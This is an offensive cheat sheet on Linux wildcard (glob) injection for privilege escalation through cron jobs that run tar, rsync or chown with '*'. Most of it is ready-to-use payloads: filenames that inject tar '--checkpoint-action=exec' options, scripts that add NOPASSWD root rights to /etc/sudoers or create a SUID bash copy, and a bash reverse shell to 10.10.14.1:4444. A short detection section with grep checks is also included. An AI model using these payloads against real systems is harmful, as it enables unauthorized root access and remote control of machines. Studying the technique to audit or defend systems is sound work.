πWildcard Abuse
π― Overview
Wildcard characters (*, ?, []) interpreted by shell can be abused to inject command arguments in scripts and cron jobs for privilege escalation.
π Wildcard Characters
*
Matches any number of characters
?
Matches single character
[]
Matches characters in brackets
~
User home directory
-
Range in brackets
π― tar Command Abuse (Most Common)
Vulnerable Cron Job Example
# Cron job with wildcard
*/01 * * * * cd /home/user && tar -zcf backup.tar.gz *Exploitation Steps
# 1. Create malicious script
echo 'echo "user ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
# 2. Create argument injection files
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1
# 3. Wait for cron execution
# 4. Check sudo privileges
sudo -lHow it works: Wildcard * expands to all filenames, making tar execute:
tar -zcf backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh root.shπ§ Other Vulnerable Commands
rsync Abuse
# Vulnerable: rsync -av * /backup/
echo "" > "-e sh payload.sh"
echo 'cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash' > payload.shchown Abuse
# Vulnerable: chown root:root *
echo "" > "--reference=/etc/passwd"
# Makes files owned by rootπ Detection & Enumeration
Find Vulnerable Scripts
# Search for wildcard usage in scripts
grep -r "tar.*\*" /etc/cron* /opt/ /usr/local/ 2>/dev/null
grep -r "rsync.*\*" /etc/cron* /opt/ /usr/local/ 2>/dev/null
# Check crontab for wildcards
cat /etc/crontab | grep "\*"Quick Check Script
#!/bin/bash
echo "=== WILDCARD ABUSE CHECK ==="
echo "[+] Cron jobs with wildcards:"
cat /etc/crontab 2>/dev/null | grep "\*" | grep -v "^#"
echo "[+] Scripts using tar with wildcards:"
find /opt /usr/local -name "*.sh" -exec grep -l "tar.*\*" {} \; 2>/dev/null
echo "[+] Current directory writable for injections:"
test -w . && echo "WRITABLE: $(pwd)"π Common Payloads
Add Sudo Privileges
echo 'echo "user ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1Create SUID Binary
echo 'cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash' > suid.sh
echo "" > "--checkpoint-action=exec=sh suid.sh"
echo "" > --checkpoint=1Reverse Shell
echo 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1π Key Points
Wildcards expand to filenames - creating fake arguments
tar is most common target -
--checkpoint-action=execWorks with cron jobs - automatic execution as different user
File creation required - need write access to target directory
Timing matters - wait for scheduled execution
Wildcard abuse turns shell expansion features against the system - transforming filename globbing into arbitrary command execution for privilege escalation.
Last updated